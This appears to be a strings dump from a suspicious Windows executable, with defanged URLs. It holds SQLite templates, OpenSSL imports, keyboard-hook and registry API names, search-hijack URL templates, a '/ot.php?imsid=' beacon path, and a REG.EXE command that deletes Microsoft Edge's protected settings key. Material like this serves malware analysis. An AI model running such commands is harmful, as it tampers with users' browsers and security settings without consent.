DELETE FROM %Q.%s WHERE %s=%Q
SELECT idx,count(*) FROM %Q.sqlite_stat3 GROUP BY idx
SELECT idx,neq,nlt,ndlt,sample FROM %Q.sqlite_stat3
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
database %s is already in use
Invalid key value
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
sqlite_detach
sqlite_attach
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
no such collation sequence: %s
table %s may not be modified
cannot modify %s because it is a view
sqlite_source_id
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_get
foreign key mismatch
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
constraint %s failed
automatic extension loading failed: %s
foreign_keys
foreign_key_list
*** in database %s ***
unsupported encoding: %s
rekey
hexkey
hexrekey
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s:%d
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
sqlite_subquery_%p_
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
%s TABLE %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid>? AND rowid<?)
%s (rowid>?)
%s (rowid<?)
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
at most %d tables in a join
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
no such table column: %s.%s
CREATE TABLE x(%s %Q HIDDEN, docid HIDDEN, %Q HIDDEN)
CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
docid INTEGER PRIMARY KEY
%z, 'c%d%q'
CREATE TABLE %Q.'%q_content'(%s)
CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
PRAGMA %Q.page_size
,%s(x.'c%d%q')
FROM '%q'.'%q%s' AS x
,%s(?)
unrecognized parameter: %s
unrecognized matchinfo: %s
unrecognized order: %s
error parsing prefix parameter: %s
missing %s parameter in fts4 constructor
SELECT %s WHERE rowid = ?
malformed MATCH expression: [%s]
SELECT %s ORDER BY rowid %s
illegal first argument to %s
porter
unknown tokenizer: %s
SELECT %s WHERE rowid=?
INSERT INTO %Q.'%q_content' VALUES(%s)
%s_segments
SELECT %s
unrecognized matchinfo request: %c
%d %d %d %d
CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
CREATE TABLE x(%s
%s, %s
%s {%s}
?456789:;<=
!"#$%&'()* ,-./0123
10000000000000000010
/#URLSTR
/#URLTBL
/#WINDOWS
/$WWKeywordLinks/
/$WWKeywordLinks/BTree
/$WWKeywordLinks/Data
/$WWKeywordLinks/Map
/$WWKeywordLinks/Property
/compile_date.htm
/IPv6.hhc
/IPv6P.hhk
/sag_IP_v6_add_bibliography.htm
/sag_IP_v6_add_standards.htm
/sag_IP_v6_add_topnode.htm
/sag_IP_v6_add_Utils.htm
/sag_ip_v6_conf_ia.htm
/sag_ip_v6_conf_manual.htm
/sag_IP_v6_imp_aa.htm
/sag_ip_v6_imp_addr1.htm
/sag_ip_v6_imp_addr2.htm
/sag_ip_v6_imp_addr3.htm
/sag_ip_v6_imp_addr4.htm
/sag_ip_v6_imp_addr5.htm
/sag_ip_v6_imp_addr6.htm
/sag_ip_v6_imp_addr7.htm
/sag_IP_v6_imp_addr_node.htm
/sag_IP_v6_imp_addr_topnode.htm
/sag_ip_v6_imp_conf1.htm
/sag_ip_v6_imp_conf2.htm
/sag_ip_v6_imp_conf3.htm
/sag_ip_v6_imp_conf4.htm
/sag_ip_v6_imp_conf5.htm
/sag_ip_v6_imp_conf6.htm
/sag_IP_v6_imp_conf_node.htm
/sag_IP_v6_imp_config_items.htm
/sag_IP_v6_imp_config_meth.htm
/sag_ip_v6_imp_lab_inf.htm
/sag_IP_v6_imp_lab_node.htm
/sag_ip_v6_imp_lab_tasks.htm
/sag_IP_v6_imp_routing.htm
f /sag_IP_v6_imp_routing_table.htm
/sag_IP_v6_imp_topnode.htm
/sag_IP_v6_ovr_background.htm
/sag_IP_v6_ovr_features.htm
/sag_IP_v6_ovr_secfeatures.htm
/sag_IP_v6_ovr_topnode.htm
/sag_IP_v6_ovr_whatis.htm
/sag_ip_v6_pro_conf_node.htm
/sag_ip_v6_pro_diag_ifconf.htm
/sag_ip_v6_pro_diag_nc.htm
/sag_ip_v6_pro_diag_ping6.htm
"/sag_ip_v6_pro_diag_ping6_conn.htm
/sag_ip_v6_pro_diag_rc.htm
/sag_ip_v6_pro_diag_tracert.htm
/sag_IP_v6_pro_DiagNode.htm
/sag_ip_v6_pro_inst.htm
/sag_ip_v6_pro_instnode.htm
/sag_ip_v6_pro_remove.htm
/sag_IP_v6_pro_RouteNode.htm
/sag_ip_v6_pro_rt_add.htm
/sag_ip_v6_pro_rt_enable.htm
/sag_ip_v6_pro_rt_remove.htm
/sag_ip_v6_pro_rt_view.htm
/sag_IP_v6_tro_topnode.htm
/sag_IP_v6_und_core_topnode.htm
/sag_IP_v6_und_icmp.htm
/sag_ip_v6_und_ie.htm
/sag_IP_v6_und_ip.htm
/sag_IP_v6_und_MLD.htm
/sag_IP_v6_und_ND.htm
/sag_IP_v6_und_netapps.htm
/sag_IP_v6_und_nr.htm
/sag_IP_v6_und_topnode.htm
/sag_IP_v6_und_winsock.htm
/sag_IP_v6checklist.htm
/sag_IP_v6concepts.htm
/sag_IP_v6procedures.htm
/sag_IP_v6topnode.htm
<&_::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/
i::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ResetTable
HHA Version 4.74.8702
MS-ITS:IPv6.chm::/sag_IP_v6topnode.htm
%-Ub
a}.SU
mFf.XUs
F:\pV
%D=]WP
-YdWp}H
u|%dU)
@-t}Y!
n.yJkZ_
[.eAk
3.MNS!W
hE.mI
&si%d
RvjY].Hy
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
.rsrc
.FF=6
ÝL\
(%UV3
m`%C%
W.ik"
"%dpd
B.dX\
K.MsiNOSVW4M
_%xCr
(,P$.dd
ag[.FI
>S<%d
u<.hl#
.pc-p11
ySV%sy
4.VX9o
.EKS[
6.JN,
'vOp%DQV
GVa.Za
%b%CT
?4.bX
a,%fMi
FSg.jP
.IX9n[
?VSQ
(mackX@4.mG]
?%Cp`7
Hx
.BOFW
.yI~zRPSN
sŸu
\.LPT\
,X):
_CRTjECUAG
1.0.1g 7Q9
c%FIP
&'()* ,-./
key?iGjivj
.pp@0
>.Dh$
[ u?%
%'%1$=%C%K%O%s%
&'&)&5&;&?
.%.-.3.7.9.?.W.[.o.y.
3Ó/353A3G3[3_3g3k3
C%C'C3C7C9COCWCiC
BUILTIN_KEYp
-Key: 26my
.pkmg`
7JOING8
.VnbC
WG|s.nN
_keyf
~/faq.Dml
DO@.@.CB
.djosu'
SShKm%'
22####2222
lmO`.Tn
tq.FC)
H.Xl?g
y.zF.
%2sBRO
?o.zmT
62%8sRq
@!,9\^00
E>O%s?
d.kek
.dBhP^p
&Az6T}b
[[%s]]
HTTP/
s<.na9
6144819
u [.WiG
l}C.we
R.QA@
.QEht
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.VC90.CRT" version="9.0.30729.4148" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
KERNEL32.DLL
ADVAPI32.dll
CRYPT32.dll
GDI32.dll
MSVCR90.dll
USER32.dll
WS2_32.dll
ReportEventA
CertOpenStore
LIBEAY32.dll
AES_set_decrypt_key
AES_set_encrypt_key
AES_unwrap_key
AES_wrap_key
ASN1_PCTX_get_cert_flags
ASN1_PCTX_set_cert_flags
AUTHORITY_KEYID_free
AUTHORITY_KEYID_it
AUTHORITY_KEYID_new
BF_set_key
BIO_get_port
BIO_set_tcp_ndelay
CAST_set_key
CERTIFICATEPOLICIES_free
CERTIFICATEPOLICIES_it
CERTIFICATEPOLICIES_new
CMS_EncryptedData_set1_key
CMS_RecipientInfo_ktri_cert_cmp
CMS_RecipientInfo_set0_key
CMS_RecipientInfo_set0_password
CMS_RecipientInfo_set0_pkey
CMS_SignerInfo_cert_cmp
CMS_SignerInfo_set1_signer_cert
CMS_add0_CertificateChoices
CMS_add0_cert
CMS_add0_recipient_key
CMS_add0_recipient_password
CMS_add1_cert
CMS_add1_recipient_cert
CMS_decrypt_set1_key
CMS_decrypt_set1_password
CMS_decrypt_set1_pkey
CMS_get1_certs
CMS_set1_signers_certs
Camellia_set_key
DES_check_key_parity
DES_is_weak_key
DES_key_sched
DES_random_key
DES_read_2passwords
DES_read_password
DES_set_key_checked
DES_set_key_unchecked
DES_string_to_2keys
DES_string_to_key
DH_check_pub_key
DH_compute_key
DH_generate_key
DSA_generate_key
ECDH_compute_key
EC_KEY_check_key
EC_KEY_clear_flags
EC_KEY_copy
EC_KEY_dup
EC_KEY_free
EC_KEY_generate_key
EC_KEY_get0_group
EC_KEY_get0_private_key
EC_KEY_get0_public_key
EC_KEY_get_conv_form
EC_KEY_get_enc_flags
EC_KEY_get_flags
EC_KEY_get_key_method_data
EC_KEY_insert_key_method_data
EC_KEY_new
EC_KEY_new_by_curve_name
EC_KEY_precompute_mult
EC_KEY_print
EC_KEY_print_fp
EC_KEY_set_asn1_flag
EC_KEY_set_conv_form
EC_KEY_set_enc_flags
EC_KEY_set_flags
EC_KEY_set_group
EC_KEY_set_private_key
EC_KEY_set_public_key
EC_KEY_set_public_key_affine_coordinates
EC_KEY_up_ref
ENGINE_cmd_is_executable
ENGINE_ctrl_cmd
ENGINE_ctrl_cmd_string
ENGINE_get_cmd_defns
ENGINE_get_load_privkey_function
ENGINE_get_load_pubkey_function
ENGINE_get_pkey_asn1_meth
ENGINE_get_pkey_asn1_meth_engine
ENGINE_get_pkey_asn1_meth_str
ENGINE_get_pkey_asn1_meths
ENGINE_get_pkey_meth
ENGINE_get_pkey_meth_engine
ENGINE_get_pkey_meths
ENGINE_get_ssl_client_cert_function
ENGINE_load_private_key
ENGINE_load_public_key
ENGINE_load_ssl_client_cert
ENGINE_pkey_asn1_find_str
ENGINE_register_all_pkey_asn1_meths
ENGINE_register_all_pkey_meths
ENGINE_register_pkey_asn1_meths
ENGINE_register_pkey_meths
ENGINE_set_cmd_defns
ENGINE_set_default_pkey_asn1_meths
ENGINE_set_default_pkey_meths
ENGINE_set_load_privkey_function
ENGINE_set_load_pubkey_function
ENGINE_set_load_ssl_client_cert_function
ENGINE_set_pkey_asn1_meths
ENGINE_set_pkey_meths
ENGINE_unregister_pkey_asn1_meths
ENGINE_unregister_pkey_meths
ESS_CERT_ID_dup
ESS_CERT_ID_free
ESS_CERT_ID_new
ESS_SIGNING_CERT_dup
ESS_SIGNING_CERT_free
ESS_SIGNING_CERT_new
EVP_BytesToKey
EVP_MD_pkey_type
EVP_PKCS82PKEY
EVP_PKEY2PKCS8
EVP_PKEY2PKCS8_broken
EVP_PKEY_add1_attr
EVP_PKEY_add1_attr_by_NID
EVP_PKEY_add1_attr_by_OBJ
EVP_PKEY_add1_attr_by_txt
EVP_PKEY_delete_attr
EVP_PKEY_get_attr
EVP_PKEY_get_attr_by_NID
EVP_PKEY_get_attr_by_OBJ
EVP_PKEY_get_attr_count
EXTENDED_KEY_USAGE_free
EXTENDED_KEY_USAGE_it
EXTENDED_KEY_USAGE_new
JPAKE_get_shared_key
KRB5_ENCKEY_free
KRB5_ENCKEY_it
KRB5_ENCKEY_new
NETSCAPE_CERT_SEQUENCE_free
NETSCAPE_CERT_SEQUENCE_it
NETSCAPE_CERT_SEQUENCE_new
NETSCAPE_SPKI_get_pubkey
NETSCAPE_SPKI_set_pubkey
OCSP_CERTID_dup
OCSP_CERTID_free
OCSP_CERTID_it
OCSP_CERTID_new
OCSP_CERTSTATUS_free
OCSP_CERTSTATUS_it
OCSP_CERTSTATUS_new
OCSP_basic_add1_cert
OCSP_cert_id_new
OCSP_cert_status_str
OCSP_cert_to_id
OCSP_parse_url
OCSP_request_add1_cert
OCSP_url_svcloc_new
PEM_read_DSAPrivateKey
PEM_read_DSA_PUBKEY
PEM_read_ECPrivateKey
PEM_read_EC_PUBKEY
PEM_read_NETSCAPE_CERT_SEQUENCE
PEM_read_PKCS8_PRIV_KEY_INFO
PEM_read_PUBKEY
PEM_read_PrivateKey
PEM_read_RSAPrivateKey
PEM_read_RSAPublicKey
PEM_read_RSA_PUBKEY
PEM_read_X509_CERT_PAIR
PEM_read_bio_DSA_PUBKEY
PEM_read_bio_ECPrivateKey
PEM_read_bio_EC_PUBKEY
PEM_read_bio_PKCS8_PRIV_KEY_INFO
PEM_read_bio_PUBKEY
PEM_read_bio_RSA_PUBKEY
PEM_read_bio_X509_CERT_PAIR
PEM_write_DSAPrivateKey
PEM_write_DSA_PUBKEY
PEM_write_ECPrivateKey
PEM_write_EC_PUBKEY
PEM_write_NETSCAPE_CERT_SEQUENCE
PEM_write_PKCS8PrivateKey
PEM_write_PKCS8PrivateKey_nid
PEM_write_PKCS8_PRIV_KEY_INFO
PEM_write_PUBKEY
PEM_write_PrivateKey
PEM_write_RSAPrivateKey
PEM_write_RSAPublicKey
PEM_write_RSA_PUBKEY
PEM_write_X509_CERT_PAIR
PEM_write_bio_DSA_PUBKEY
PEM_write_bio_ECPrivateKey
PEM_write_bio_EC_PUBKEY
PEM_write_bio_PKCS8PrivateKey_nid
PEM_write_bio_PKCS8_PRIV_KEY_INFO
PEM_write_bio_PUBKEY
PEM_write_bio_RSA_PUBKEY
PEM_write_bio_X509_CERT_PAIR
PKCS12_MAKE_KEYBAG
PKCS12_MAKE_SHKEYBAG
PKCS12_PBE_keyivgen
PKCS12_add_cert
PKCS12_add_key
PKCS12_add_localkeyid
PKCS12_certbag2x509
PKCS12_certbag2x509crl
PKCS12_decrypt_skey
PKCS12_key_gen_asc
PKCS12_key_gen_uni
PKCS12_newpass
PKCS12_x5092certbag
PKCS12_x509crl2certbag
PKCS7_add_certificate
PKCS7_cert_from_signer_info
PKCS8_PRIV_KEY_INFO_free
PKCS8_PRIV_KEY_INFO_it
PKCS8_PRIV_KEY_INFO_new
PKCS8_add_keyusage
PKCS8_pkey_get0
PKCS8_pkey_set0
PKEY_USAGE_PERIOD_free
PKEY_USAGE_PERIOD_it
PKEY_USAGE_PERIOD_new
PROXY_CERT_INFO_EXTENSION_free
PROXY_CERT_INFO_EXTENSION_it
PROXY_CERT_INFO_EXTENSION_new
RC2_set_key
RC4_set_key
RSAPrivateKey_dup
RSAPrivateKey_it
RSAPublicKey_dup
RSAPublicKey_it
SEED_set_key
SRP_Calc_client_key
SRP_Calc_server_key
TS_CONF_load_cert
TS_CONF_load_certs
TS_CONF_load_key
TS_CONF_set_certs
TS_CONF_set_ess_cert_id_chain
TS_CONF_set_signer_cert
TS_CONF_set_signer_key
TS_MSG_IMPRINT_dup
TS_MSG_IMPRINT_free
TS_MSG_IMPRINT_get_algo
TS_MSG_IMPRINT_get_msg
TS_MSG_IMPRINT_new
TS_MSG_IMPRINT_print_bio
TS_MSG_IMPRINT_set_algo
TS_MSG_IMPRINT_set_msg
TS_REQ_get_cert_req
TS_REQ_get_msg_imprint
TS_REQ_set_cert_req
TS_REQ_set_msg_imprint
TS_RESP_CTX_set_certs
TS_RESP_CTX_set_signer_cert
TS_RESP_CTX_set_signer_key
TS_TST_INFO_get_msg_imprint
TS_TST_INFO_set_msg_imprint
X509_CERT_AUX_free
X509_CERT_AUX_it
X509_CERT_AUX_new
X509_CERT_AUX_print
X509_CERT_PAIR_free
X509_CERT_PAIR_it
X509_CERT_PAIR_new
X509_CRL_get0_by_cert
X509_PKEY_free
X509_PKEY_new
X509_PUBKEY_free
X509_PUBKEY_get0_param
X509_PUBKEY_it
X509_PUBKEY_new
X509_PUBKEY_set
X509_PUBKEY_set0_param
X509_REQ_check_private_key
X509_REQ_get_pubkey
X509_STORE_CTX_set_cert
X509_STORE_get1_certs
X509_certificate_type
X509_check_private_key
X509_get0_pubkey_bitstr
X509_get_default_cert_area
X509_get_default_cert_dir
X509_get_default_cert_dir_env
X509_get_pubkey
X509_get_pubkey_parameters
X509_keyid_get0
X509_keyid_set1
X509_load_cert_crl_file
X509_load_cert_file
X509_pubkey_digest
X509_supported_extension
X509_verify_cert
X509_verify_cert_error_string
_ossl_old_des_is_weak_key
_ossl_old_des_key_sched
_ossl_old_des_random_key
_ossl_old_des_read_2passwords
_ossl_old_des_read_password
_ossl_old_des_string_to_2keys
_ossl_old_des_string_to_key
_shadow_DES_check_key
aesni_set_decrypt_key
aesni_set_encrypt_key
b2i_PrivateKey
b2i_PrivateKey_bio
b2i_PublicKey
b2i_PublicKey_bio
d2i_AUTHORITY_KEYID
d2i_CERTIFICATEPOLICIES
d2i_DSAPrivateKey_bio
d2i_DSAPrivateKey_fp
d2i_DSAPublicKey
d2i_DSA_PUBKEY
d2i_DSA_PUBKEY_bio
d2i_DSA_PUBKEY_fp
d2i_ECPrivateKey
d2i_ECPrivateKey_bio
d2i_ECPrivateKey_fp
d2i_EC_PUBKEY
d2i_EC_PUBKEY_bio
d2i_EC_PUBKEY_fp
d2i_ESS_CERT_ID
d2i_ESS_SIGNING_CERT
d2i_EXTENDED_KEY_USAGE
d2i_KRB5_ENCKEY
d2i_NETSCAPE_CERT_SEQUENCE
d2i_OCSP_CERTID
d2i_OCSP_CERTSTATUS
d2i_PKCS8PrivateKey_bio
d2i_PKCS8PrivateKey_fp
d2i_PKCS8_PRIV_KEY_INFO
d2i_PKCS8_PRIV_KEY_INFO_bio
d2i_PKCS8_PRIV_KEY_INFO_fp
d2i_PKEY_USAGE_PERIOD
d2i_PROXY_CERT_INFO_EXTENSION
d2i_PUBKEY
d2i_PUBKEY_bio
d2i_PUBKEY_fp
d2i_PrivateKey_fp
d2i_RSAPrivateKey_bio
d2i_RSAPrivateKey_fp
d2i_RSAPublicKey_bio
d2i_RSAPublicKey_fp
d2i_RSA_PUBKEY
d2i_RSA_PUBKEY_bio
d2i_RSA_PUBKEY_fp
d2i_TS_MSG_IMPRINT
d2i_TS_MSG_IMPRINT_bio
d2i_TS_MSG_IMPRINT_fp
d2i_X509_CERT_AUX
d2i_X509_CERT_PAIR
d2i_X509_PKEY
d2i_X509_PUBKEY
i2b_PrivateKey_bio
i2b_PublicKey_bio
i2d_AUTHORITY_KEYID
i2d_CERTIFICATEPOLICIES
i2d_DSAPrivateKey_bio
i2d_DSAPrivateKey_fp
i2d_DSAPublicKey
i2d_DSA_PUBKEY
i2d_DSA_PUBKEY_bio
i2d_DSA_PUBKEY_fp
i2d_ECPrivateKey
i2d_ECPrivateKey_bio
i2d_ECPrivateKey_fp
i2d_EC_PUBKEY
i2d_EC_PUBKEY_bio
i2d_EC_PUBKEY_fp
i2d_ESS_CERT_ID
i2d_ESS_SIGNING_CERT
i2d_EXTENDED_KEY_USAGE
i2d_KRB5_ENCKEY
i2d_OCSP_CERTID
i2d_OCSP_CERTSTATUS
i2d_PKCS8PrivateKeyInfo_bio
i2d_PKCS8PrivateKeyInfo_fp
i2d_PKCS8PrivateKey_bio
i2d_PKCS8PrivateKey_fp
i2d_PKCS8PrivateKey_nid_bio
i2d_PKCS8PrivateKey_nid_fp
i2d_PKCS8_PRIV_KEY_INFO
i2d_PKCS8_PRIV_KEY_INFO_bio
i2d_PKCS8_PRIV_KEY_INFO_fp
i2d_PKEY_USAGE_PERIOD
i2d_PROXY_CERT_INFO_EXTENSION
i2d_PUBKEY
i2d_PUBKEY_bio
i2d_PUBKEY_fp
i2d_PrivateKey_fp
i2d_RSAPrivateKey_bio
i2d_RSAPrivateKey_fp
i2d_RSAPublicKey_bio
i2d_RSAPublicKey_fp
i2d_RSA_PUBKEY
i2d_RSA_PUBKEY_bio
i2d_RSA_PUBKEY_fp
i2d_TS_MSG_IMPRINT
i2d_TS_MSG_IMPRINT_bio
i2d_TS_MSG_IMPRINT_fp
i2d_X509_CERT_AUX
i2d_X509_CERT_PAIR
i2d_X509_PKEY
i2d_X509_PUBKEY
i2o_ECPublicKey
o2i_ECPublicKey
private_AES_set_decrypt_key
private_AES_set_encrypt_key
private_RC4_set_key
Thawte Certification1
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
<VeriSign Class 3 Public Primary Certification Authority - G50
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
hXXps://VVV.verisign.com/cps0*
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
hXXp://VVV.vmware.com/0
O"%U.
<V.TZ
"`#.hr
MP0.jc
%DP`H
v%%DH
~.xp`I
.VQWd
\.WWWW9
tCPTFlRPu
?%D|W
\.DHLP.
\.hlpt.
is %d?)`
'%s:%d: reX
ng)msg_hdr|
.too smh7
?gKey-Arg
_KEY_BLOC
.UDICQ
@.MNl1
SSLEAY32.dll
SSL_CTX_get_cert_store
SSL_CTX_get_client_cert_cb
SSL_CTX_set_cert_store
SSL_CTX_set_cert_verify_callback
SSL_CTX_set_client_cert_cb
SSL_CTX_set_client_cert_engine
SSL_CTX_set_msg_callback
SSL_CTX_set_srp_password
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey
SSL_CTX_use_RSAPrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_certificate_ASN1
SSL_add_dir_cert_subjects_to_stack
SSL_add_file_cert_subjects_to_stack
SSL_check_private_key
SSL_export_keying_material
SSL_get_certificate
SSL_get_peer_cert_chain
SSL_get_privatekey
SSL_set_msg_callback
SSL_use_PrivateKey
SSL_use_PrivateKey_ASN1
SSL_use_PrivateKey_file
SSL_use_RSAPrivateKey
SSL_use_RSAPrivateKey_ASN1
SSL_use_RSAPrivateKey_file
SSL_use_certificate
SSL_use_certificate_ASN1
SSL_use_certificate_file
WinExec
SetProcessShutdownParameters
SetNamedPipeHandleState
GetWindowsDirectoryA
GetConsoleOutputCP
GetCPInfo
RegOpenKeyExA
RegCloseKey
RegSaveKeyA
RegRestoreKeyA
RegQueryInfoKeyW
RegQueryInfoKeyA
RegOpenKeyExW
RegFlushKey
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
SetViewportOrgEx
ShellExecuteW
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
EnumChildWindows
CreateDialogIndirectParamW
CreateDialogIndirectParamA
ActivateKeyboardLayout
GetKeyboardType
.idata
.rdata
P.reloc
P.rsrc
*.ALS
*<>#%"{}|\^[]`
hXXps://
/ot.php?imsid=
sDELETE "HKCU\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy" /f
REG.EXE
hXXp://VVV.w3.org/2001/XMLSchema
hXXp://VVV.w3.org/2000/xmlns/
hXXp://VVV.w3.org/2001/XMLSchema-instance
{searchTerms}&text2=%s&suggest=1&type=6
{searchTerms}&text2=%s&instant=1&type=6
{searchTerms}&text2=%s&search=1&type=6
hXXp://google.com
888816666554443
6666554443
!6666554443
No matching DOM Vendor: "%s"<Selected DOM Vendor does not support this property or method;Property or Method "%s" is not supported by DOM Vendor "%s"
Node "%s" not found
IDOMNode required.Attributes are not supported on this node type
Invalid node type Mismatched paramaters to RegisterChildNodes Element does not contain a single text node4DOM Implementation does not support IDOMParseOptions
Node is readonlyCRefresh is only supported if the FileName or XML properties are set
HSQLite library initialization failed. Main code [%d], extended code [%d]/Database specified by [%p] handle was not foundHVTab: Invalid number of arguments at VTabCreate. Expected [%d], got [%d](VTab: Dataset [%s] is not found or empty VTab: Operation is not supported!VTab: Savepoint [%d] is not found!VTab: Dataset modification failed/VTab: Explicit ROWID at INSERT is not supported9VTab: Dataset state was changed. Cannot perform operation"VTab: Specified row does not exist
VTab: Invalid cursor;TADLocalSQL must be attached to an active SQLite connection0VTab: DataSet [%s] is busy by another result set/Cannot perform action. DBTOOLn.DLL is not found
Unnamed)"%s" DOMImplementation already registered
